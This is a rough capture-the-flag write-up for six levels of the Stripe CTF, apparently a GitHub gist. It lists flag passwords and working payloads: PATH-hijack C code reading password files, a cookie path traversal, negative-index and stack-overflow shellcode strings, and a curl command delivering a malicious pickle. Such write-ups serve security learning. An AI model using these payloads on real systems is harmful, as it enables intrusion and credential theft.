Stripe CTF Challenge - Solutions to all Levels
| Stripe CTF - Work Notes | |
| mpetrov (petrov.michael@gmail.com) | |
| These notes are very rough. They should give a general idea of how each level was solved. | |
| ---- LEVEL 01 (login: e9gx26YEb2) ----- | |
| Solution: modifying PATH env variable | |
| Password: kxlVXUvzv | |
| date.c | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| int main(void) { | |
| printf( | |
| " UID GID \n" | |
| "Real %d Real %d \n" | |
| "Effective %d Effective %d \n", | |
| getuid (), getgid (), | |
| geteuid(), getegid() | |
| ); | |
| system("ls -la /home/level02/"); | |
| system("cat /home/level02/.password"); | |
| return 0; /* always good to return something */ | |
| } | |
| ---- LEVEL 02 (login: kxlVXUvzv) ----- | |
| Solution: set cookie to: ../../home/level03/.password | |
| Password: Or0m4UX07b | |
| ---- LEVEL 03 (login: Or0m4UX07b) ----- | |
| Solution: negative index exploit | |
| Password: i5cBbPvPCpcP | |
| NotesROUGH NOTES: | |
| - target function (using nm): 0x804875b run | |
| - use gdb to break in truncate_and_call | |
| - step through a bit | |
| - get pointer of buf | |
| - compare to pointer of fns | |
| - -0x70 difference, negative index exploit about to work | |
| - array pointers are 4 bytes apart | |
| - run -26 $'./a.out\n\x5b\x87\x04\x08' | |
| ---- LEVEL 04 (login: i5cBbPvPCpcP) ----- | |
| Solution: buffer overflow exploit | |
| Password: fzfDGnSmd317 | |
| ROUGH NOTES: | |
| - some overflow... | |
| - system is 0x890cec83 | |
| - "smashing the stack for fun and profit" | |
| - brute force isolation of return pointer (1037 th character) | |
| $'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA' | |
| - printf("Usage: ./level04 STRING");, ./level04 is key (turned out to be irrelevant at the end) | |
| - 0x080485b7: "./level04 STRING" | |
| - gdb: x/x system 0xf75d23d0 <system>: 0x890cec83 | |
| - found "call *eax 804847f" in disassembly | |
| - Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php | |
| - Shellcode for "./a.out\n": | |
| // 48 bytes | |
| $'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA' | |
| ---- LEVEL 05 (login: fzfDGnSmd317) ----- | |
| Solution: unpickle exploit | |
| Password: SF2w8qU1QDj | |
| ROUGH NOTES | |
| - touch result.txt | |
| - chmod 777 result.txt | |
| - curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.' | |
| - exploit code (primitive but works): | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| #include <stdio.h> | |
| int main(void) { | |
| printf( | |
| " UID GID \n" | |
| "Real %d Real %d \n" | |
| "Effective %d Effective %d \n", | |
| getuid (), getgid (), | |
| geteuid(), getegid() | |
| ); | |
| system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt"); | |
| system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt"); | |
| return 0; /* always good to return something */ | |
| } | |
| cat result.txt | |
| - SUCCESS! | |
| ---- LEVEL 06 (login: SF2w8qU1QDj) ----- | |
| Solution: timing attack on the fork system call | |
| Details: https://gist.github.com/1899389 | |
| Password: theflagl0eFTtT5oi0nOTxO5 | |
| ROUGH NOTES: | |
| - had to ssh through level05 for some reason (later was fixed) | |
| - if stdout and stderr can be blocking then we can time their outputs and find where the wrong characters are | |
| - http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection | |
| - http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process | |
| - https://bugzilla.redhat.com/attachment.cgi?id=91467 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
One-liner for level 02: curl --digest -u level02 -b user_details='../../home/level03/.password' http://ctf.stri.pe/level02.php